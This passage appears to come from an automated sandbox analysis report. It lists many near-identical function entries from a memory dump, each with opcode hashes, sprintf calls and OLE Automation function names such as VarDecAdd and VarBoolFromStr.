Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarNot$ord%u
API String ID: 590974362-232931943
Opcode ID: 3f763926ac1dc5681a2cc0eafd852fee32ee9925b32b29c288bcc18591f151dc
Instruction ID: 268ea6fd2b96c11f26537f2344b42293f6c1786419876e196a34940026365ec3
Opcode Fuzzy Hash: 3f763926ac1dc5681a2cc0eafd852fee32ee9925b32b29c288bcc18591f151dc
Instruction Fuzzy Hash: 5BE086E6E0432917E205D664BC91AFB77989F81525F4809BFF58341141E76AD21C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC310, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarNeg, xrefs: 02BCC310
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarNeg$ord%u
API String ID: 590974362-3390363900
Opcode ID: 75e7befd34413bd9f25291fa7eaefb4ab3b6aa271b78973f2e1800b5e85ecadc
Instruction ID: f823b96948ee21bf03d00b872a28ea2daedde4c41d9cec4ce5fc67b6725e6bb3
Opcode Fuzzy Hash: 75e7befd34413bd9f25291fa7eaefb4ab3b6aa271b78973f2e1800b5e85ecadc
Instruction Fuzzy Hash: 4EE04FA6E0432A26E201DA54BC91AEA778C9F81525F480CBEF58381101E666920C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC301, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarInt, xrefs: 02BCC301
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarInt$ord%u
API String ID: 590974362-2770939696
Opcode ID: 4dc8898a4fea2fdaab633d3c9d6d21011455971f134af92c8d2a679bd5deded8
Instruction ID: cfe7dc6756b1bcba46969cb8ac6ce763e200bba0c961937901ff4da9ad63f66c
Opcode Fuzzy Hash: 4dc8898a4fea2fdaab633d3c9d6d21011455971f134af92c8d2a679bd5deded8
Instruction Fuzzy Hash: F7E026A6E0432617E201CA54BC81AFB7388AFC1524F480CBEF58240100F366920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC379, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecSub, xrefs: 02BCC379
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecSub$ord%u
API String ID: 590974362-3935427513
Opcode ID: 39c26d49b2e313f845e49146da19cc74ba24abc82121f3fa320fa3c5c026d075
Instruction ID: ce456d39d268f15e7ea1479c395c8dbe059543303772ef97ede701b40d5b757e
Opcode Fuzzy Hash: 39c26d49b2e313f845e49146da19cc74ba24abc82121f3fa320fa3c5c026d075
Instruction Fuzzy Hash: 29E086A6E0435A17F201D654BC91AFB77D8AFC1525F584DBEF58241100F766920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC36F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

CreateTypeLib2, xrefs: 02BCC36F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: CreateTypeLib2$ord%u
API String ID: 590974362-171070353
Opcode ID: 390490a60bb668b6928fbc3f024531efaca1803a91eb0d0942d8cd04c3b7bbcb
Instruction ID: ce89930c2b62cf0916fcfc490267fb6094b7170237bd3c8200710288011326f8
Opcode Fuzzy Hash: 390490a60bb668b6928fbc3f024531efaca1803a91eb0d0942d8cd04c3b7bbcb
Instruction Fuzzy Hash: ECE086A6E0431917E205D664BC51AFB77989F81529F4809BFF58341140E76AD21C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC360, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecMul, xrefs: 02BCC360
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecMul$ord%u
API String ID: 590974362-3735828743
Opcode ID: 051a62847e1f4369588b0dc51f967ddbe803e9f943e9f963d03f43c61709d43a
Instruction ID: 619f5cddec52889d66136a3fc74e89964aeeff5afe71cdf59495ab3a4a2722bc
Opcode Fuzzy Hash: 051a62847e1f4369588b0dc51f967ddbe803e9f943e9f963d03f43c61709d43a
Instruction Fuzzy Hash: F0E086E6E0435A27E201D658BC91AFB77C89F81525F4808BFF58381100F76AD20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC351, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecDiv, xrefs: 02BCC351
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecDiv$ord%u
API String ID: 590974362-2595580088
Opcode ID: ef125463db417db0b3bfe1d9f7a944d38140de08130750938ff255472581f55a
Instruction ID: 1f8335bb72bd81ed117c0e089d8b0443423c23ac87cc87c624470f710f999e96
Opcode Fuzzy Hash: ef125463db417db0b3bfe1d9f7a944d38140de08130750938ff255472581f55a
Instruction Fuzzy Hash: 48E086A6E0435A17E201DA58BC91AFB7798AFC1525F584DBEF58341100F776920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC347, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecAdd, xrefs: 02BCC347
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecAdd$ord%u
API String ID: 590974362-3144070593
Opcode ID: d6ce0f9c432637a25655e5718877385cf4cf7def7f5a28ea69de83feca1c26ac
Instruction ID: d1a12f9ee760b77ddbd4cf0d934d03a48a035f96138dacd68f11638965698bf3
Opcode Fuzzy Hash: d6ce0f9c432637a25655e5718877385cf4cf7def7f5a28ea69de83feca1c26ac
Instruction Fuzzy Hash: 56E086A6E0431917E205D664BC51AFB77D89F81525F4809BFF58341140E76BE21D86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0B8, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarWeekdayName, xrefs: 02BCC0B8

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarWeekdayName$ord%u
API String ID: 590974362-3576235581
Opcode ID: be801648befd21c6f6f254df1bb7cdf1e9ba0407b083b509434a353681425117
Instruction ID: 94c4286b06e92ec611b8edc1832ed8674dbab4a8d8012af552e1880b0bb7746b
Opcode Fuzzy Hash: be801648befd21c6f6f254df1bb7cdf1e9ba0407b083b509434a353681425117
Instruction Fuzzy Hash: B5E086A6E0431A27E201D654BC91AFB77C89F81525F4809BFF59781100E766E20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0A9, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarFormatCurrency, xrefs: 02BCC0A9

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarFormatCurrency$ord%u
API String ID: 590974362-2632468804
Opcode ID: c14be2ff75bb20b2710a6bc35a115a8c8110e89dc774c428c8aec3fcf5454aed
Instruction ID: 4a5651c7e789c2f12e6846ef8fcacb33effaedb8db55fbc0f6a47f2f11500af4
Opcode Fuzzy Hash: c14be2ff75bb20b2710a6bc35a115a8c8110e89dc774c428c8aec3fcf5454aed
Instruction Fuzzy Hash: 0BE086A6E0831A17E201D654BC91AFB7798AFC1525F584DBEF98741100F7A6920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC09F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBoolFromDisp, xrefs: 02BCC09F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromDisp$ord%u
API String ID: 590974362-1042544894
Opcode ID: 321da75afc8e802ca431d4ea0572bfdde7e93df76a25e4ebe9e5e14db58bad44
Instruction ID: bfd2d24e9d30beb0d37003beed616537ffb9de2a8d3c54f5cf6098358957e98a
Opcode Fuzzy Hash: 321da75afc8e802ca431d4ea0572bfdde7e93df76a25e4ebe9e5e14db58bad44
Instruction Fuzzy Hash: 94E086A6E0431517E205D654BC51AFB7798AF81525F480DBFF58741240E76BD21CCAA3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC090, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBoolFromStr, xrefs: 02BCC090
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromStr$ord%u
API String ID: 590974362-1264585163
Opcode ID: 8a26a28231686e82d912d8cc3a44b1915577f9c90010c604a73bb42456d3398b
Instruction ID: e9dd1cbafe3f4983e7a49bacc4392fe76b5d57a996e0550e2c8b7ea8728e996b
Opcode Fuzzy Hash: 8a26a28231686e82d912d8cc3a44b1915577f9c90010c604a73bb42456d3398b
Instruction Fuzzy Hash: 3EE086A6E0435A27E201D654BC91AFB77DC9F81525F480CBFF98781100E766D20C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC081, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarBoolFromCy, xrefs: 02BCC081

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromCy$ord%u
API String ID: 590974362-3154006303
Opcode ID: 36aa92777303041403ba095627e709cebb99f383543cc2f8055f9f03f829b500
Instruction ID: 56b41f9096ad502331978e4cbe7b68cd6c99884ac0dd486183bb111606d521f0
Opcode Fuzzy Hash: 36aa92777303041403ba095627e709cebb99f383543cc2f8055f9f03f829b500
Instruction Fuzzy Hash: FDE026A6E0431617E201C654BC81AFB7388AFC1524F480CBEF98340100F366920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0F9, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromR8, xrefs: 02BCC0F9
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromR8$ord%u
API String ID: 590974362-1621497220
Opcode ID: b8604e7ff3885a2611449af1b8bdad298f24a45ae333328f643dc547cd1ff012
Instruction ID: b154b90096b5fe3f52d96e0dcc066db4350f051e1379fb490b41b9e7632f7392
Opcode Fuzzy Hash: b8604e7ff3885a2611449af1b8bdad298f24a45ae333328f643dc547cd1ff012
Instruction Fuzzy Hash: D6E026A6E0431617E201C654BC81AFF7388AFC1524F4808BEF58240200F366D20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0EF, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromR4, xrefs: 02BCC0EF
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromR4$ord%u
API String ID: 590974362-2802221040
Opcode ID: 25d60950b5792b735d7c0074e557fdfcff4b7056d5e75b836bec8854ca52766b
Instruction ID: 3f6c7df29b9cce6eb2e6553a218f5d039a5b1ded7305cd289c845e2194fedde6
Opcode Fuzzy Hash: 25d60950b5792b735d7c0074e557fdfcff4b7056d5e75b836bec8854ca52766b
Instruction Fuzzy Hash: 53E026A6E0431513E201D6A4BC91AFB73889F81424F4808BFF58340140F76BD20C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0E0, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromI4, xrefs: 02BCC0E0
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromI4$ord%u
API String ID: 590974362-2262258317
Opcode ID: 2bc1270d8de0c550a9fd9ca43c99ca28a0cec5950b88f8cdaa08cb056b50cf8a
Instruction ID: cc44a6b9655aa27e4ef6942342cb6946a01a8962be1b0d142dd5d7910d15cfbb
Opcode Fuzzy Hash: 2bc1270d8de0c550a9fd9ca43c99ca28a0cec5950b88f8cdaa08cb056b50cf8a
Instruction Fuzzy Hash: 9EE086A6E0432A27E201D658BC91AFF77CC9F81525F4808BFF59781100E766D24C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0D1, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI1FromI2, xrefs: 02BCC0D1
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI1FromI2$ord%u
API String ID: 590974362-3842467767
Opcode ID: e69144e5e8836c57a24907467f4b3b5187bafb02149f4517e9f8b60450217eb6
Instruction ID: b5b866ef7cfa8a7bdead26871e6ba6dc10d9203421398e35a749ff521455598c
Opcode Fuzzy Hash: e69144e5e8836c57a24907467f4b3b5187bafb02149f4517e9f8b60450217eb6
Instruction Fuzzy Hash: CDE086BAE0831617E201D654BC91AFB7798AFC1525F5849BEF59741100F766920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC0C7, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
